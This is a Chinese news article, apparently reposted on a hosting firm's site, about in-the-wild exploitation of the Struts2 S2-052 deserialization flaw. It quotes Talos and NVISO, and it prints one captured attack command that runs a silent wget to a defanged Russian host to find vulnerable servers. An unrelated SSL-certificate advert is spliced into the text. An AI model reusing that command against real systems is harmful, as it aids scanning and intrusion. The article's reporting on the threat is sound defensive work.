新聞中心
9月5日,千瘡百孔的 Struts2 應(yīng)用又曝出存在新的高危遠(yuǎn)程代碼執(zhí)行漏洞(S2-052)。該漏洞由 lgtm.com 的安全研究員匯報(bào),編號(hào)為 CVE-2017-9805 ,漏洞危害程度為高危(Critical)。其實(shí),相似的漏洞已經(jīng)在 Struts 中多次發(fā)現(xiàn),今年早些時(shí)候攻擊者還利用了 Windows 服務(wù)器中的 Apache Struts 漏洞散發(fā) Cerber 勒索軟件。

酉陽土家族苗族ssl適用于網(wǎng)站、小程序/APP、API接口等需要進(jìn)行數(shù)據(jù)傳輸應(yīng)用場景,ssl證書未來市場廣闊!成為創(chuàng)新互聯(lián)公司的ssl證書銷售渠道,可以享受市場價(jià)格4-6折優(yōu)惠!如果有意向歡迎電話聯(lián)系或者加微信:028-86922220(備注:SSL證書合作)期待與您的合作!
近日,來自思科 Talos 實(shí)驗(yàn)室和 NVISO 實(shí)驗(yàn)室的研究員也發(fā)現(xiàn),已經(jīng)有攻擊者真實(shí)利用了 S2-052 的漏洞。
事實(shí)上,漏洞爆出的第二天,就有研究人員利用這個(gè)漏洞進(jìn)行了滲透測試。
有一些研究人員表示,這個(gè)遠(yuǎn)程代碼利用漏洞與 Struts 反序列化處理不受信任的數(shù)據(jù)有關(guān),會(huì)影響自 2008 年以來所有版本的 Apache Struts,從 Struts 2.5 到 Struts 2.5.12。由于 Struts REST 通信插件在反序列化過程中無法合理處理 XML payloads,因此所有使用這個(gè)插件的 web 應(yīng)用都有可能遭到遠(yuǎn)程代碼執(zhí)行攻擊。目前財(cái)富 100 強(qiáng)的企業(yè)中,至少有 65% 的企業(yè)使用 Struts,因此,這些企業(yè)都應(yīng)當(dāng)提高警惕。
而來自 Contrast Security 的安全專家則表示:
| 這個(gè)漏洞只影響同時(shí)使用 Struts 2 和 Struts 2 REST 插件的應(yīng)用。ZDNet 對(duì)此漏洞影響的報(bào)道有些夸大,他們可能默認(rèn)了所有使用 Struts 2 的人都會(huì)使用 Struts 2 REST 插件。而我們所檢測到的數(shù)據(jù)顯示,我們所負(fù)責(zé)的 Java 應(yīng)用使用 Struts 2 REST 插件的比例不到 1%。來自 Maven 的數(shù)據(jù)顯示,Struts 2 核心庫擁有 167 名下游客戶,而 Struts 2 REST 插件庫則只有 9 名下游客戶,由此可以看出這個(gè)插件的應(yīng)用范圍和漏洞的影響范圍。 |
不論是影響范圍廣,還是影響范圍小,只要有漏洞,就有可能被攻擊者利用。
來自思科 Talos 實(shí)驗(yàn)室和 NVISO 實(shí)驗(yàn)室的研究員就表示,有攻擊者利用一個(gè)俄羅斯網(wǎng)站發(fā)送請求并搜集結(jié)果,檢測是否存在漏洞尚未修復(fù)的服務(wù)器,以便進(jìn)一步展開攻擊。
| 漏洞爆出后,我們很快就發(fā)現(xiàn)攻擊者利用這個(gè)漏洞的實(shí)例。目前,利用實(shí)例看起來只處于初步探測階段,同時(shí)會(huì)發(fā)出請求、檢測可能存在的未修復(fù)漏洞的目標(biāo)。如下是我們檢測到的發(fā)出 HTTP 請求的樣本。 |
/bin/sh -c wget -qO /dev/null http://wildkind[.]ru:8082/?vulnerablesite
這個(gè)請求將會(huì)發(fā)起 wegt 請求,將 HTTP 的相應(yīng)結(jié)果寫入 /dev/null。這意味著這個(gè)請求純粹進(jìn)行的是瀏覽檢測活動(dòng),可以識(shí)別遠(yuǎn)程服務(wù)器上有哪些網(wǎng)站存在可被利用的漏洞。
NVISO 安全專家也檢測到了類似結(jié)果:
| 由于該行為向 /struts2-rest-showcase/orders/3 發(fā)送了 POST 請求,因此我們第一時(shí)間檢測到了這個(gè)活動(dòng)抓包結(jié)果顯示,這個(gè)活動(dòng)主要是為了探查存在漏洞的目標(biāo):抓包到的 payload 實(shí)際上是 /bin/sh 命令,能執(zhí)行某被入侵的俄羅斯網(wǎng)站發(fā)布的靜默 wget 命令,獲取請求瀏覽的網(wǎng)站名稱,而下載內(nèi)容則會(huì)被丟棄。 |
Talos 研究員還表示,這個(gè)活動(dòng)探測過程中,有可能會(huì)發(fā)送惡意文件。目前還在進(jìn)一步分析之中。
這再一次說明,只要有漏洞爆出,黑客黑快就會(huì)進(jìn)行利用。在S2-052 漏洞爆出的 48 小時(shí)內(nèi),我們不斷監(jiān)測利用該漏洞的系統(tǒng)活動(dòng)。其實(shí)漏洞出現(xiàn)的第一時(shí)間就有補(bǔ)丁發(fā)布,但是黑客為了錢,還是能很快進(jìn)行逆向并開發(fā)出利用代碼。如今的網(wǎng)絡(luò)環(huán)境中,如果企業(yè)花幾星期甚至幾個(gè)月對(duì)漏洞進(jìn)行應(yīng)急響應(yīng)已經(jīng)來不及了?,F(xiàn)在需要在幾天或者幾小時(shí)內(nèi)迅速響應(yīng)才能避免更多損失。在應(yīng)急響應(yīng)中,企業(yè)應(yīng)當(dāng)分秒必爭。
以下附上攻擊實(shí)例利用代碼,僅做研究參考,嚴(yán)禁用于非法目的。
文章題目:Struts2新漏洞(S2-052)出現(xiàn)利用實(shí)例,面對(duì)漏洞企業(yè)應(yīng)當(dāng)分秒必爭
分享鏈接:http://m.fisionsoft.com.cn/article/codjsii.html


咨詢
建站咨詢
